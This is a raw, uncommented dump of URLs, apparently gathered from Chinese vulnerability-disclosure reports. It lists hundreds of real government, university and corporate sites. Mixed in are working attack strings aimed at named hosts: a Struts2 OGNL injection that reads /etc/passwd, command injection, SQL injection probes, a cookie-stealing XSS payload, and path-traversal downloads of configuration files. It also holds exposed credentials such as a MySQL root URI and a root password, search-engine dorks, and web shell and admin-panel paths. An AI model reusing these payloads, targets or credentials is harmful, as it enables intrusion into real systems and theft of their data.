http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 https://szfesc.cn/ http://www.shashi.gov.cn/bocai/yulecheng/index.html http://www.xjbljj.gov.cn/data/r5ha/yBuHq/Ker/ http://yulecheng.hnmaotian.gov.cn/ http://www.zjjjs.gov.cn/bc/bjbylc/ http://www.tl.gov.cn/art/art_40_4838.html http://www.cyx.gov.cn/ http://www.wjinvest.gov.cn/en/yongliyulechengdubo/index.asp http://www.hdsqjy.gov.cn/tgs/index.html 
http://www.comic.gov.cn/picture/zrdxn/html/news/470.htm http://www.bzly.gov.cn/admin/FCKeditor/editor/ylc/myitea/ http://www.hllinkou.gov.cn/baijile/ http://www.jdzedu.gov.cn/edit/dialog/aibodi/bogouyulecheng/index.asp site:gov.cn shopbuilder:www.shop-builder.cn http://atc.seu.edu.cn/manage/PicNewsShow.asp?id=1 http://www.rxwzjs.com/ inurl://News/view/id/12.html http://www.anypas.com/News/view/id/190*.html http://www.sqlmap.org www.anypas.co http://qq.api.10jing.com/index.php?act=guideapi.getCitySummary&guideid=4242&deviceType=5&platform=android https://yktj.gov.cn/phpmyadmin/ http://www.doyouhike.net/user/1147140 http://www.ttkdex.com/ttkdweb/serviceguide/guestbook.html http://www.jiajiao114.com/ http://ac.qfkd.com.cn/ http://wxy.hqu.edu.cn/hqdx/xyxwx.asp?id=347 http://www.gzife.edu.cn/portal http://portal.gzife.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail_home.jsp?infoId=56415&config_id=23366 http://portal.ruc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=6377&config_id=5168 http://info.pumc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=11665&config_id=5039 http://portal.shfc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showMoreInfoList.jsp?configId=15715 http://portal.cupes.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/noteDetailShow.jsp?noteId=18896 http://info.btbu.edu.cn:8080/eapdomain/static/component/cms/cmp_cms_pim_show/infoList.jsp?ID=5586 http://xgb.uibe.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=6227&config_id=8340 http://portal.dlut.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showFileInfo.jsp?infoId=306395&config_id=4747 http://portal.shisu.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=27491&config_id=22088 inurl:/sm2005 http://**.**.**/JiangSu/systemsetting/userLogin.action http://218.94.1.82/ http://218.94.1.82/ 
data.zjepi.net/ZheJiang/systemsetting/userLogin.action_ cn:81/ShangRao/systemsetting/userLogin.action_ http://www.eduease.com/data.rar www.antasys.com http://antasys.3322.org:688/ http://antasys.3322.org:688/dgn/dgn_tools/ping.php?ipdm=127.0.0.1;ls&ps=64&cnt=1 http://antasys.3322.org:688//dgn/dgn_tools/cappkt.php http://antasys.3322.org:688//dgn/dgn_tools/tracert.php http://antasys.3322.org:688/doc/phpmy/index.php; inurl:bencandy http://union.skywldh.com/index.php/user/welcome http://www.sanya.gov.cn/publicfiles/business/htmlfiles/mastersite/cmsmedia/document/2012/10/doc9445.txt http://democn.mall-builder.com/ http://202.38.232.84/eresources/view.php?page=1&view=a&cata=%E7%94%B5%E5%AD%90%E5%9B%BE%E4%B9%A6&orderby=d_hits http://demo.zoomla.cn/User/Register.aspx http://demo.zoomla.cn/User/Login.aspx?ReturnUrl= http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx http://wsbs.sihui.gov.cn:28017/ http://oa.xndxfz.com http://oa.bsyey.com http://oa.dhssx.com http://oa.bashu.com.cn http://www.cqxjwxx.com.cn http://ltzx.zhedu.net.cn http://www.wxzzyey.com http://ww1980.cqjjzx.com http://zqzx.mhedu.sh.cn http://www.czlcxx.com http://mhzx.mhedu.sh.cn http://www.cqjjzx.com http://www.whjksyxx.com http://218.4.82.234 http://www.thgz.net http://www.trxx.fxedu.cn http://www.jsgyve.com http://www.cqyc.com http://jsshrzx.com:8987 http://ptsunshine.cn http://www.nths.cn http://www.slyey.cn:89/slyey http://www.ysx.net.cn http://mqxx.mhedu.sh.cn http://58.214.27.195 http://www.sx-school.net http://bj50f.com:8080 http://222.191.250.185 http://www.xishan.net http://www.zcbgxx.net:81 http://222.190.122.226:2080 http://tk.cqbxzx.com http://219.153.125.109 http://www.bndjw.com http://www.xxx.net/webschool/inc/user_choose_stu.jsp http://www.goldmail.cn/product/bulletin/news_detail.php?ID=199 http://m.ch999.com/brandlist.aspx?cid=2 http://wooyun.org/bugs/wooyun-2014-068118 url:http://oa.hbzyy.org/email/lookemail.asp?id=18230 
http://www.juesheng.com/zhuanti/aodaliyatouziyimin http://www.juesheng.c http://sqlmap.org http://www.nitc.cc/ http://demo.nitc.cc/ http://www.cnnitc.com/ http://test.nitc.cc/ http://demo.cnnitc.com/office/backdb/2014-08-05-173036.php http://www.snciq.gov.cn/ http://www.snciq.gov.cn:6198/car/login.action http://www.chinawebber.com/,还烦请cncert国家互联网应急中心检测一下其他站点是否存在该漏洞。 http://jxt.tuntron.com/ http://www.wdaac.cn/login/index.aspx http://mydns3.xinnet.com http://www.ahsj.gov.cn/ http://www.ahsj.gov.cn/search.htm http://music.google.cn/search?newwindow=1&q=infoms%2Fidentity%2Findex.c&btnG=Google+%E6%90%9C%E7%B4%A2 http://220.178.0.180/infoms/identity/index.c http://218.76.27.109/infoms/identity/index.c http://aid.ec.js.edu.cn/infoms/identity/index.c http://202.119.175.107/infoms/identity/index.c http://58.213.129.204/infoms/ http://listen.kekenet.com/public.php?la_id=7801 inurl:/ws2004/ inurl:/vc2003/login/ inurl:/sm2005 inurl:/SM2005/ http://www.***.com/SM2005/public/WebEditor/upload.asp?action=save&type=IMAGE&style=luoye http://edu.chanjet.com/phpmyadmin/ http://edu.chanjet.com/a.php http://edu.chanjet.com/1.txt http://oa.xndxfz.com http://oa.bsyey.com http://oa.dhssx.com http://oa.bashu.com.cn http://www.cqxjwxx.com.cn http://ltzx.zhedu.net.cn http://www.wxzzyey.com http://ww1980.cqjjzx.com http://zqzx.mhedu.sh.cn http://www.czlcxx.com http://mhzx.mhedu.sh.cn http://www.cqjjzx.com http://www.whjksyxx.com http://218.4.82.234 http://www.thgz.net http://www.trxx.fxedu.cn http://www.jsgyve.com http://www.cqyc.com http://jsshrzx.com:8987 http://ptsunshine.cn http://www.nths.cn http://www.slyey.cn:89/slyey http://www.ysx.net.cn http://mqxx.mhedu.sh.cn http://58.214.27.195 http://www.sx-school.net http://bj50f.com:8080 http://222.191.250.185 http://www.xishan.net http://www.zcbgxx.net:81 http://222.190.122.226:2080 http://tk.cqbxzx.com http://219.153.125.109 http://www.bndjw.com http://www.jsgyve.com:80/webschool/ www.jsgyve.com http://survey.dianping.com/ 
http://demo.zoomla.cn/User/login.aspx demo.zoomla.cn/User/UserZone/AddStructure.aspx http://www.lenovostoreapp.com/ http://www.lenovostoreapp.com/admin/index.php http://www.lenovodm.cn/ www.lenovodm.cn/frontoperation.rar http://med.hunnu.edu.cn/news/admin/news.asp?id=2145 http://demo.zoomla.cn/User/login.aspx http://demo.zoomla.cn/User/PrintServer/Project/ProjectList.aspx http://www.sylr.gov.cn/upfile/wwwr/PresaleWindow.asp?allowsell_id=75 https://github.com/xdy2001/share.dp/tree/master/shareDP-web mysql://root:aix@rt#@192.168.6.233/DianPing?charset=utf8 mysql://root:aix@rt#@192.168.6.233/DianPing?charset=utf8 http://biz.finance.sina.com.cn/news_through/amore.php?date=2008-09-03&order=%20desc http://219.224.69.196/,登录后台验证不全,导致用户名密码均填入 http://www.wlxy.gxnu.edu.cn/show.asp?ArticleID=1276 username:wlxy http://114.80.230.213/upload.php http://optools.anjuke.com/search.php?cityid=14 http://114.80.230.205/ http://www.meijialx.com/city-detail/class_id:36 http://192.168.1.200:8080/view/newsfind.action http://192.168.1.200:8080/news/newsIndex.jsp http://192.168.1.200:8080/view/newsfindByType.action http://192.168.1.200:8080/notice/noticefind.action http://192.168.1.200:8080/noticeRecipient/noticeRecipientfind.action http://192.168.1.200:8080/user/expertfind.action http://192.168.1.200:8080/user/vExpertviewFind.action http://drops.wooyun.org/papers/548 http://cp.g.candou.com/ lylm.hnatu.com/Voyage.aspx?void=34 www.gsjszj.gov.cn/yqsb/viewhuifu.asp?info_id=16217 http://www.sxqx.net:8080/csyb/Default.aspx?Stationnum=58453 http://www.sxqx.net:8080/zcdl/regist.asp http://www.sxgxbys.com/ http://www.sxgxbys.com/news/login.asp?id=9 http://www.ncer.cn/admin.do http://www.fabgou.com/index.php?app=gcategory&cate_id=71 http://demo.zoomla.cn/USER/Develop%5CSiteAdmin/BackupSite.aspx http://www.cmaritime.com.cn http://www.cmaritime.com.cn http://www.cmaritime.com.cn/downfile.php?id=xxx http://www.cmaritime.com.cn/downfile.php?id=admin.php 
http://www.cmaritime.com.cn/downfile.php?id=/www/china/include/config.inc.php http://221.123.169.66:8080/ http://home.scnu.edu.cn/sfzx/project/lab_preview.php?lab_id=106&type=B http://club.hoau.net/COwebsite/login.do http://***.yunos.com/还存在其他安全问题: http://ct.ctrip.com/crptravel/index.aspx http://ct.ctrip.com/corptravel/mainpage.aspx inurl:/VOD2005 http://www.sh-cloud.com/ http://www.sh-cloud.com/indexToMessage.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29 http://www.sh-cloud.com/js/c.jsp http://1x.openwbs.com/ http://jwc.jnu.edu.cn/readnews.asp?id=2351&bigclassname=%BD%CC%CE%F1%B4%A6&smallclassname=%BF%CE%B3%CC%D6%D0%D0%C4&SpecialID=0 http://121.207.240.137:28017/serverStatus?text=1 http://121.207.240.137:28017 http://121.207.240.137:28017/_replSet http://lib.zzu.edu.cn/ArticleShow.aspx?aid=a2a59862-9f0b-47e9-adba-031a89d2da8e&sid=355dc7e7-f4c5-4ab7-a760-a30475ca55e6 http://oa.syc.com.cn/OA/index/index.aspx http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx http://221.199.203.230:9001/dsoa/index/index.aspx http://180.166.56.106/dsoa/index/index0.aspx http://sd.tobacco.com.cn/dsoa_kgj_web/index/index0.aspx http://oa.syc.com.cn/oa/useradmin/index.aspx http://oa.syc.com.cn/oa/FCKeditor/editor/filemanager/connectors/asp/connector.asp http://oa.syc.com.cn/oa/useradmin/index.aspx http://www.ai6.com/ 
http://119.188.124.150/kefu/index.php?m=index&a=show&id=176&classid=163 http://course.xmu.edu.cn/meol/homepage/common/search_teacher_main.jsp http://www.suyaxing.com/ Google:inurl:/vodweb/affiche.asp http://www.frxinzhong.cn/vod2005/vodweb/affiche.asp?id=1 https://42.62.23.136/ user:root pass:calvin http://210.44.126.14/TASi/submitstep1.asp?action=master&lang=gb http://paper.sysu.edu.cn/TASi/submitstep1.asp?action=doctor&lang=gb https://***.alibaba-inc.com/ssoLogin.htm?APP_NAME=webmail&BACK_URL=https%3A%2F%2Fmail.alibaba-inc.com%2Falimail%2F&CANCEL_CERT=true&CONTEXT_PATH=%2Falimail%2F http://www.jajaa.cn/userSecurity/retrievePasswordTrend http://www.mama.cn/ask/q4457881-p1.html http://www.hisense.com) Ver:3.5.5 www.zte-s.cc http://www.ztetech.com.cn/ http://music.google.cn/search?newwindow=1&q=inurl%3Acomm_front&btnG=Google+%E6%90%9C%E7%B4%A2 http://www.chinacreator.com/ http://www.jetsum.com/ http://www.whldkjgs.com/upload.jsp?name=/WEB-INF/web.xml http://www.whxianggang.cn/upload.jsp?name=/WEB-INF/web.xml http://wetem.net.cn/upload.jsp?name=/WEB-INF/web.xml http://www.hbyl.gov.cn/upload.jsp?name=/WEB-INF/web.xml http://www.hbyfxxw.com/upload.jsp?name=/WEB-INF/web.xml http://wooyun.org/bugs/wooyun-2014-070716 http://www.wdaac.cn/Channel/TableDownLoadList.aspx?deptid=weihai393030 http://www.wdaac.cn/Bulletin/DocmentDownload.aspx?ID=10023 http://www.wdaac.cn/Bulletin/DocmentDownload.aspx?ID=10023 http://shenpi.qingdao.gov.cn/Bulletin/DocmentDownload.aspx?ID=15863 http://wsbs.bjft.gov.cn/ftww/Bulletin/DocmentDownload.aspx?ID=02713 http://xzfw.yunyang.gov.cn/Bulletin/DocmentDownload.aspx?ID=04104 http://www.5210.cn/Bulletin/DocmentDownload.aspx?ID=03361 http://www.cqspbxz.com/application/gzhd/bgxz/download.jsp?filename=WEB-INF/web.xml http://www.cqspbxz.com/application/gzhd/bgxz/download.jsp?filename=web-inf/classes/ http://www.flsp.cn/application/gzhd/bgxz/download.jsp?filename=WEB-INF/web.xml 
http://www.ddkspdt.com/application/gzhd/bgxz/download.jsp?filename=WEB-INF/web.xml http://61.186.175.242/application/gzhd/bgxz/download.jsp?filename=WEB-INF/web.xml http://61.128.175.37/application/wsbs/qyjmbsqiantai/download.jsp?filename=web-inf/web.xml http://music.google.cn/search?newwindow=1&q=inurl%3Acomm_front&btnG=Google+%E6%90%9C%E7%B4%A2 http://www.chinacreator.com/ https://svn.xml.so/svn/infdc http://q50launch.infiniti.com.cn/index.php/admin/login http://q50launch.infiniti.com.cn/js/kindeditor/php/Themes_template.php http://zbb.nankai.edu.cn/Views/tenderNewsContent.aspx?tenderNewsID=3884 https://vpn.yiwu.gov.cn/por/login_psw.csp?rnd=0.09960567764937878 http://www.mama.cn/ask/?g=Ucenter&uid=20631331 http://www.yongqi.com.cn/bgLogin.jsp http://www.spph-sx.com/ http://www.spph-sx.com/webedit/admin_uploadfile.asp?id=14&dir= http://www.spph-sx.com/webedit/admin_default.asp http://www.crca.cn/mojiyemian.jsp?digID=18&directoryid=18 http://www.rdjt.zjut.edu.cn/gvScript/xin http://www.chinapanda.org.cn/topic.php?id=33 http://hz.zhujia360.com/article/search/?keyword=1357919988 http://zzsme.zhangzhou.gov.cn/ http://zzsme.zhangzhou.gov.cn/index.php/News/detail/id/150 http://shipin.zhsfda.gov.cn/遵化食品安全监管平台 http://shipin.zhsfda.gov.cn/index.php/Admin/Tongzhi/chakan/tongzhiid/40 http://jx.10086.cn/www/cms/user_mbi.php?uid=1268648'&action=query&page_no=-19874&tran_code=&sdate=&edate= http://59.108.128.6:80/NGOSS/login.action http://demo.zoomla.cn/user/UserShop/OrderList.aspx?menu=souch&souchtable=&souchkey= http://qudian.pptv.com/ http://sfocs.sf-express.com/im-client/imclient/login.action?source=cn&goto2011=2011&hl=zh_CN http://www.bdwsj.gov.cn http://www.bdwsj.gov.cn/index.php/New/collist/colid/38 http://labs.chinamobile.com/report/reportArea/?cateid=1&i=24&sort=time http://www.meizu.com/services/questionContent.html?questionId=765093 http://998.21tb.com http://sp.ickey.cn/user/login.html http://61.178.40.9:7001/x3/ 
http://zzb.dahe.cn/fore/getCommentList.shtml?comManList.rticleNo=64169 http://elearning.hpe-online.com/hpe/login-HPE.jsp http://elearning.hpe-online.com/hpe/loginvalidation.action http://zpyc.bankofdl.com http://career.sdebank.com http://zhaopin.cnooc.com.cn www.biad.com.cn:88/ http://ehr.creditcard.cmbc.com.cn http://61.232.6.108/ inurl:hrss/login.jsp inurl:hrss/rm inurl:hrss/index.html http://zhaopin.cnooc.com.cn:80/ http://www.shaoxinghotel.com.cn/admin/ http://www.shaoxinghotel.com.cn/admin/aspcheck.asp www.shaoxinghotel.com.cn http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default http://www.rlzysc.gd.gov.cn/working.aspx?page=view&menu=2&d=25e http://url.cn/VNW1B5 http://share.weiyun.com/26ef1d114796fde0b5a32a9c1f90179f http://oa.515158.com/ http://www.sina.com.cn http://www.sina.com.cn http://www.yiliang.gov.cn/info.asp?id=1298&catid=6 http://bbs.home.chshcms.com/index.php/show/index/17 http://bbs.home.chshcms.com/index.php/show/index/17 http://zt.pusa123.com/ http://zt.pusa123.com/specialadmin_ccplusds2012abk01/login.php http://zt.pusa123.com/plus/flink.php inurl:riseapprove_web http://XXXX/riseapprove_web/secondPage/findWorkProceeding.do http://XXXX/riseapprove_web/sencondPage/moreResultFormula.do http://www.nazbcg.com/TSinNetCommons/download.do?id=B8121A0A-2D2D-40F4-9F3D-BCC50B7551BE http://www.nazjfw.com/NaZxGlxt/web/gonggao/tsxx.jsp?id=451591BD-D743-4BFB-B879-8F975ECF3661 http://www.jszbw.com/TSPB/web/zbgg/Content.jsp?pubGuid=3E49118DD8AAB0EBEF22BCB73E243576 http://www.jsspzx.gov.cn/JsWeb/news/ShowContent.jsp?infoId=69B0C570AE1FE9B32EBC2EB8150E35D1 http://spfwzx.zjwjj.gov.cn/wjjspfwzx/hnbanshi.jsp?spaRENTID=9D5C5C2B-F77F-486E-A808-9A13F00C112 http://60.12.186.79/TSPB/web/news/List.jsp?parentId=69E2EFF31C15466194E746A322465A94&PUBTYPE=7 http://www.nayqhq.com/NaYqHq/web/news/news_content.jsp?infoId=1D3E4D6A68891D32C5157DA8AB171119 
http://www.jxedzsp.gov.cn/jxkfqglxt/web/news/news_content.jsp?infoId=EBFFF98F593CF4D2D2BC30086E38WWWW http://sa.cins.cn/v9.tar.gz http://sa.cins.cn/v9/目录下的 http://english.gzhu.edu.cn/newsdetail.aspx?id=80 http://txl.zjnu.edu.cn/class/class_index1.asp?classid=3000010007 http://download.discuz.net/Discuz/7.2/Discuz_7.2_SC_GBK.zip http://demo.zoomla.cn/guest/GuestShow.aspx?GID=1 http://demo.zoomla.cn/guest/GuestShow.aspx?GID=1 http://bbs.xunlei.com/home.php?mod=task&do=draw&id=7 http://api3.chepinhui.com/api.php/request http://www.51tek.com/category-199.html#top http://hqbzc.cug.edu.cn/old/shuidian/newsview.asp?fileid=11 http://kecheng.lut.cn/coursefile/gangjiegousheji_20090305/index.php?action=teacher&todo=infor&teacher_id=445 http://npe.hbtcm.edu.cn/coursefile/zhongyaopaozhixue_20110621/?action=teacher&todo=infor&teacher_id=330 http://gongxiang.51tek.com/coursefile/danpianjiyuanliyuyingyong_20100514/?action=teacher&todo=infor&teacher_id=80 http://jpkc.huanghuai.edu.cn/coursefile/sixiangdaodexiuyangyufalvjichu_20120330/index.php?action=teacher&todo=infor&teacher_id=410 http://jpkc.njtc.edu.cn/coursefile/jiexijihe_xiaoji__20090504/index.php?action=teacher&todo=infor&teacher_id=329 http://wyjpk.whu.edu.cn/kc/ces00/?action=teacher&todo=infor&teacher_id=115 http://jpk.tgc.edu.cn/coursefile/chayi_20090525/index.php?action=teacher&todo=infor&teacher_id=100 http://jpkc.jxbsu.com:8080/kc/mzgl/index.php?action=teacher&todo=infor&teacher_id=368 http://www.wandoujia.com/offlinepush/push?did=aea63ec6e44f4855b51e06e7ad290648f53c944a&title=%E6%90%9C%E7%8B%97%E6%89%8B%E6%9C%BA%E8%BE%93%E5%85%A5%E6%B3%95&url=http://apps.wandoujia.com/apps/com.sohu.inputmethod.sogou/download?pos=www/detail&versioncode=322&packagename=com.sohu.inputmethod.sogou Google:inurl:ListMore.aspx?ModuleID http://www.chengduair.cc http://www.chengduair.cc/Feedback.asp http://www.tjcoc.gov.cn/ http://pingjia.tjcoc.gov.cn/index.php/user/index/num/100496 post:http://www.aapinche.cn/api/mobile/User.ashx 
http://v.youku.com/v_show/id_XNzUyMzg4OTMy.html http://jmjtzyy.com/yyghxt/Admin/Admin_Login.asp http://jmjtzyy.com/bbs/Admin/Index.asp http://www.jdair.net/index.jsp http://nba.weibo.com/forum/fans/rank_list?forum_id=7&order_field=post_num&order_type=DESC http://www.jdair.net/index.jsp http://skcostg.sf-express.com/jmx-console/ http://www.qingchifan.com/ http://www.sdaxue.com/u/comment/38665.html http://web.4399.com/hd/xdns2/geren/?id=4399000806 http://www.hbsxhsd.com http://www.hbsxhsd.com//shijiazhuang/upload/images/201153114472909.cer;1.gif http://lib.cnpc.com.cn/bbs/bbs_reply.asp?boardid=3 http://lib.cnpc.com.cn/List.asp?act=MultiQuery&lang=gb&all=111 http://61.142.209.134:81/manager/html http://www.zzfdc.gov.cn/fcxw/new.jsp?id=189065 http://member.8090yxs.com/api/address.php?sname= http://www.bjlyjy.com/) http://www.101dai.com/common-getpasswordemail.shtml http://218.200.200.167/ http://struts.apache.org/release/2.2.x/docs/s2-005.html http://qq.999.com.cn/ http://qq.999.com.cn/mainframe.asp http://qq.999.com.cn/system/AddPhoneRecordChannel.aspx?CustomerID=1&AuthorID=1&ID=1&EditPhoneNo=1&AccessUserID=1&RecInfoInvokeID=1&PhoneTime=1 inurl:edu inurl:classify.asp?cate= http://www.lib.whu.edu.cn/5/news/classify.asp?cate=1 http://geology.nwu.edu.cn:81/jxyd/models/cn/addresslist/edit.asp?id=452 http://beta.zjtvu.edu.cn/Bmwy/kfxy/search/news/classify.asp?cate=1'&id=759&Fid=760&Nav=1 http://mall.zoomla.cn/,也就是 http://www.huaweidevice.com.eg/huawei_ar/sphider/admin/admin.php www.huaweidevice.com.eg http://www.lilyenglish.com/ http://www.dg121.com/ http://www.dg121.com/tld/admin/Admin/Admin_Setting.asp http://www.dg121.com/tld/admin/mEditor_Full.html http://www.dg121.com/tld/201488174128291.aspx dgsqxj:dg+121 http://123.147.164.34:8080/default.aspx http://www.999.com.cn/news2.aspx?tid=18&id=455 http://www.999.com.cn/news2.aspx?tid=18&id=455 http://www.iflytek.com/index.php?a=contactmap&c http://sqlmap.org http://www.qysi.gov.cn/index.jsp 
http://www.qysi.gov.cn/jsp/website/unitquery/unitcheck1.jsp?org_id=001&AAB001=1 http://canting.deitui.com/ http://health.yeecare.com/company/yeecare.php?id=8625 http://health.yeecare.com/search.php?keywords=%27 http://fankui.163.com/server-info?config http://fankui.163.com/server-info http://210.45.128.60:80/csmain/detailnotice.asp?noticeid=253 http://210.45.128.60//cs/jsjjc/ksxt/commonlogin.asp http://123.147.164.63:8083/login.jsp http://www.huzsafety.gov.cn/proscenium/pxhg/viewPxhgF.xhtml http://www.ltt-hna.com/Index/Default.aspx http://www.ltt-hna.com/Index/TrainingPlanAdmissionNoticeForIndex.aspx?NoticeID=72 http://radio.stu.edu.cn/play.php?id=129 http://ins.cufe.edu.cn/news.asp?bigtype=%B9%FA%BC%CA%BD%BB%C1%F7&smalltype=%B9%FA%BC%CA%BA%CF%D7%F7%CF%EE%C4%BF http://ss.xju.edu.cn/xjusoft/index.do http://sss.bnu.edu.cn/view.php?id=244 inurl:getlist.asp?pmid= http://www.jxgcxy.tzc.edu.cn/sy/getlist.asp?pmid=146&fmid=147 http://www.sqlmap.org www.jxgcxy.tzc.edu.cn\session http://muagent-jp.ceair.com/test/a/user_detail.aspx?usrId=1 http://merchant.test.zol.com/index.php?c=GoodsManagerManu https://reg.163.com重置了该账号密码,问题是生日。。。 http://bio.njau.edu.cn:8003/biocontent.asp?nid=1625&leibie=n91 http://www.foundertech.com/ http://espace.foundertech.com/innerweb/default.aspx http://www1.gdufs.edu.cn/gwyjs/yjsc/specialList.php?specialid=26 http://demo.vgoshop.com/ http://www.feidee.com/money/登陆是有一定限制的,错误几次就会提示禁止登陆。 http://www.hisense.com) Ver:3.5.5 inurl:/ScmUser/login.aspx http://www.sdx.sh.cn/tg/Silic.jsp http://www.sdx.sh.cn/tg/t1.jsp http://www.sdx.sh.cn/tg/fs.jsp http://kczy.zjut.edu.cn/cellweb/Article_Print.asp?ArticleID=90 http://kczy.zjut.edu.cn/cellweb/Admin_Login.asp http://haha.baozou.com/plus/wrong.php?vid=105102+and+123%3D%28select+123+from+mysql.user+limit+1%29+and+sleep%286-6%29 http://221.11.139.173:8083/ http://1.202.236.237:8860/ http://1.202.236.237:8860/Web_3GJiZuFuWuGX/Web_3GJiZuFuWuGX.rar 
http://221.11.139.173:8083/%E7%A7%BB%E5%8A%A8%E8%BF%90%E8%A1%8C%E7%BD%91%E5%8F%98%E6%9B%B420130130%E5%8F%98%E6%9B%B4%E5%8C%85.rar http://www.wooyun.org/bugs/wooyun-2010-059360,提到的是升腾软件系统的漏洞,一个任意文件下载漏洞,刁飞了~然后打算也去研究一下这个系统,结果发现用户量特别大啊~发现一个注入点,可导致涉及到网上备案系统,危害巨大啊!哈哈,前人任意文件下载都首页,我这注入点就 www.centerm.com.cn/product/productIndex.aspx http://203.93.109.22:8085/jtscxy/portal/ http://www.757599.com/recharge.aspx http://oa.zto.cn/ http://www.ddphp.cn/bm/ http://fwzx.cnta.gov.cn/yjjyNR-list2.asp?t_id=3 http://www.cnhww.com/demo5/admin/login.asp http://pt.3g.qq.com/s?aid=touchLogin&bid_code=qqbuyLogin&css=http%3A%2F%2Fapp.t.qq.com%2Fdownload.php%3Fkey%3D8e1b1ba1-a9de-438a-9f66-a073d7e60da0%26name%3Dhello.css&go_url=http%3A%2F%2Fparty.wanggou.com%2Ftws64%2Fm%2Fh5v1%2FcpLogin%3Frurl%3Dhttp%253A%252F%252Fwww.paipai.com%252Fm2%252Findex.html http://dev.t.qq.com/html/upload.html http://app.t.qq.com/download.php?key=2d5c8fcd-e194-45da-9ba7-0a46c33f0d23&name=hello.css www.szpsun56.com http://www.szpsun56.com/news/html/?518.html http://kyc.heuet.edu.cn/Report/Gensituation.aspx?tableID=4 http://lib.heuet.edu.cn/Pages/NewsDetail.aspx?sysid=548 http://www.zsb.bupt.cn/view_BKemployNews.php?id=477 http://dx.xjtu.edu.cn/ st:http://dx.xjtu.edu.cn/loginAction http://shpt.imust.cn/admin/login.aspx默认进去,发表个投票,得到shell。 http://shopcgi.qqmusic.qq.com/fcgi-bin/shopsearch.fcg?value=%e6%3cimg%20src%3dX%20onerror%3deval%28location.hash.substr%281%29%29%20%e6%3e#alert%28document.cookie%29 http://www.999.com.cn/news.aspx?tid=18 http://sp.ickey.cn/ http://stock.ickey.cn/ http://stock.ickey.cn/user/default http://erp.ickey.cn http://grad.gdufe.edu.cn/detach.portal?.f=f1503&.pmn=view&action=bulletinsMoreView&.ia=false&.pen=pe1141&groupid= http://business.csair.com/page/advertise_findByStatus.action 
http://my.hb.189.cn:80/app/mobile/get_nums.php?card_type=0&city_code=10%20AND%203*2*1%3d6%20AND%20276%3d276&goods_name=GALAXY%20Note3%20SM-N9009&is_group=0&keywords=&num_id=&num_id_1=&num_id_2=&num_section=%E5%85%A8%E9%83%A8&page=1&per_num=24 http://my.hb.189.cn:80/app/mobile/get_nums.php?card_type=1'%22&city_code=10&goods_name=GALAXY%20Note3%20SM-N9009&is_group=0&keywords=&num_id=&num_id_1=&num_id_2=&num_section=%E5%85%A8%E9%83%A8&page=1&per_num=24 http://bbs.aili.com/plugin.php?id=pointsMall:index&ailibnumto=50&ailibnumfrom=0-0 http://bbs.aili.com/plugin.php?id=pointsMall:index&ailibnumto=50&ailibnumfrom=0-0%20and%201=1 http://bbs.aili.com/plugin.php?id=pointsMall:index&ailibnumto=50&ailibnumfrom=0-0%20and%201=2 http://bbs.kongzhong.com/api.php?mod[]=daliang http://bbs.kongzhong.com/uc_server/control/admin/db.php http://bbs.kongzhong.com/source/plugin/myrepeats/table/table_myrepeats.php http://i.meilishuo.net/config/ http://wooyun.org/bugs/wooyun-2010-040163出在一个地方,但是添加/修改安全邮箱的接口变了,原来的是http://www.vmall.com/member/account/sendEmail.json,这次是http://www.vmall.com/member/updateEmail.json,估计是更改接口时忘记更新安全问题了吧。。。而且这次直接是GET方式。。 https://www.google.com.tw/?gws_rd=ssl#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E5%A5%87%E6%89%8D%E7%A7%91%E6%8A%80+inurl:product.asp http://econ.ruc.edu.cn/displaynews.php?id=11831 http://www.ickey.cn/mobile/?action=login URL:http://58.248.56.80/login.jsp http://58.248.56.80/logs http://58.248.56.79/ http://m.csair.com/上面给用户恶搞订机票啊 http://passport.zhulong.com/message http://218.26.9.232:8090/gzwdoc/ntko/editoffice.jsp?FileId=14 http://www.gamepaopao.com/cmd.jsp http://smarthome.tcl.com/manager/ http://116.228.171.57:8090/ismp/spportal/ http://116.228.171.57:8090/ismp/cnlportal/ http://116.228.171.57:8090/ismp/euportal/ http://116.228.171.57:8090/ismp/opportal/ http://mail.xunway.com/fangmail/cgi/index.cgi SQLURL:http://en.uzai.com/product.aspx?Id=XL20111107745368479 
